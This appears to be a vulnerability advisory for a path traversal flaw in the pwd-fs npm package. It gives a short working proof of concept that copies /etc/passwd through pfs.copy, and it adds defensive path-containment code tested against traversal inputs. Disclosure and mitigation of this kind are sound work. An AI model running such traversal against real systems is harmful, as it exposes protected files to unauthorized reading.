Created July 17, 2023 20:27
Affected versions of this package are vulnerable to Path Traversal because the attacker-controlled parameter src (recurse-io.js#L74) flows into a sensitive file system API, createReadStream (recurse-io.js#L113). As a result, attackers may read sensitive content they are not supposed to access, such as /etc/passwd.
```javascript
// must have a directory named dir/ in the same directory as poc.js
const PoweredFileSystem = require('pwd-fs');
const pfs = new PoweredFileSystem();
pfs.copy("../../../../../../../../../../etc/passwd", "./dir")
```
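A containment check of the kind that keeps a caller-supplied src from reaching createReadStream outside an allowed directory, shown as an added example that is not code from this gist or from pwd-fs. The helper names and the /srv/uploads base directory are assumptions made for illustration.

```javascript
const fs = require('fs');
const path = require('path');

// Hypothetical helper (not pwd-fs API): resolve userPath against baseDir
// and throw if the result lands outside baseDir.
function resolveInside(baseDir, userPath) {
  if (typeof userPath !== 'string' || userPath.includes('\0')) {
    throw new Error('invalid path');
  }
  const base = path.resolve(baseDir);
  const target = path.resolve(base, userPath);
  // Compare with path.relative rather than startsWith(), which would
  // accept a sibling such as "/srv/uploads-evil" for base "/srv/uploads".
  const rel = path.relative(base, target);
  if (rel === '..' || rel.startsWith('..' + path.sep) || path.isAbsolute(rel)) {
    throw new Error('path escapes base directory');
  }
  return target;
}

// Boolean form of the same check, convenient for validation code.
function isContained(baseDir, userPath) {
  try {
    resolveInside(baseDir, userPath);
    return true;
  } catch (err) {
    return false;
  }
}

// The check runs before the file system sink. The second pass on the
// realpath stops a symlink inside baseDir from pointing outside it.
function safeReadStream(baseDir, userPath) {
  const lexical = resolveInside(baseDir, userPath);
  const real = resolveInside(fs.realpathSync(baseDir), fs.realpathSync(lexical));
  return fs.createReadStream(real);
}

// Constructed inputs; "/srv/uploads" is an assumed base directory.
const samples = ['a/b.txt', '../../../../etc/passwd', '/etc/passwd', '../uploads-evil/x'];
for (const p of samples) {
  console.log(p, '->', isContained('/srv/uploads', p));
}
```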